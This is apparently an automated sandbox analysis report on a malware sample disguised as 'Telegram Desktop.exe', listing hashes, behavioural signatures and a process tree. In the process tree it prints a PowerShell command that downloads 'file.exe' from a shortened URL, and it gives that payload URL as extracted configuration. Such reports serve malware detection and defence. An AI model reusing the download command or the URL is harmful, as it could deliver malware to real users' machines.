Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
21-07-2024 14:53
Static task
static1
Behavioral task
behavioral1
Sample
Telegram Desktop.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
Telegram Desktop.exe
Resource
win10v2004-20240709-en
General
-
Target
Telegram Desktop.exe
-
Size
310KB
-
MD5
d284f1ffcf65941c59498f41de410168
-
SHA1
404ec1fca6c6b442e2751d90cdf5cadd76395076
-
SHA256
6bf297bef2431e24bbbbca085f5774593ae2bce6ada433d59259c5608ad37dcb
-
SHA512
c25381a6b43b06905ab735f8bf21cae045d010c557f936a0aed3e173080f33d1a2eac17a4b129f972e3a4da674ff37c6c0c35c1dd28ac91ffbcd99d8ae4d8d47
-
SSDEEP
6144:z8JsLcpjzTDDmHayakLkrb4NSarQW82X+t40XIQ:IzxzTDWikLSb4NS7t2X+t40XIQ
Malware Config
Extracted
https://tinyurl.com/mmtffwh6
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 5 2268 powershell.exe 7 2268 powershell.exe 9 2268 powershell.exe 11 2268 powershell.exe 12 2268 powershell.exe -
pid Process 2268 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2268 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2268 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2512 wrote to memory of 2624 2512 Telegram Desktop.exe 31 PID 2512 wrote to memory of 2624 2512 Telegram Desktop.exe 31 PID 2512 wrote to memory of 2624 2512 Telegram Desktop.exe 31 PID 2512 wrote to memory of 2624 2512 Telegram Desktop.exe 31 PID 2624 wrote to memory of 1632 2624 cmd.exe 33 PID 2624 wrote to memory of 1632 2624 cmd.exe 33 PID 2624 wrote to memory of 1632 2624 cmd.exe 33 PID 2624 wrote to memory of 1632 2624 cmd.exe 33 PID 1632 wrote to memory of 2268 1632 cmd.exe 35 PID 1632 wrote to memory of 2268 1632 cmd.exe 35 PID 1632 wrote to memory of 2268 1632 cmd.exe 35 PID 1632 wrote to memory of 2268 1632 cmd.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\Telegram Desktop.exe"C:\Users\Admin\AppData\Local\Temp\Telegram Desktop.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\helper (2) - Copy.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K rattesting.bat3⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$webClient = New-Object System.Net.WebClient; try { $webClient.DownloadFile('https://tinyurl.com/mmtffwh6', 'file.exe') } catch { Write-Host 'Error downloading file:' $_.Exception.Message; exit 1 }"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5f929964b5f134485af70fc466642fea8
SHA12db4c80a6547a229b42d6884509a616093a524d3
SHA25664cc83e441833664b1be0f786c0b1df6a07c3f8d2acccc3c5111b6b03493521f
SHA5124d77651623f4c985e598cb2765d66828db8364dc2f1a487baf8d5f1c3b5eb11f0f2e46285cea5d0bbcbfd6965ec66d75e61d83fbde8a78e1e11015547ecd34b9
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
20B
MD5069145d73333ed9d219339186ed8ca33
SHA1554c3c0dc21aa5c6ca597642f2c74ead40ad884d
SHA2569e44ad759678d4ac99a43dee65ef90b356422f23f2262c0bfba8fe954c4bdc45
SHA51298b4bd600d2404a379285f5971679b2510020ed6e4d466d1a4739e01119c7fc6d1573a9cf3d7391e69d4618f04fd5e48f9b0bc81f7980ba86524dfb869e27474
-
Filesize
672B
MD5c328b8f4fb1cac09c058b8234731f27f
SHA1ebb8c4b9511b9b1db84fc57ef7556c8361828196
SHA256fa193e36179088f3e714f47e85b9d5fe6fb48e74cfb7910bb843a2fb8775fa73
SHA512d0078ff0d2233ef7e4ee5bbf65ccb449a519e2fa637fc357447418467682ea61bd63969bff2d7ede388bb0423e8733364484f6449ab405c82aa17acc7f153d68
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b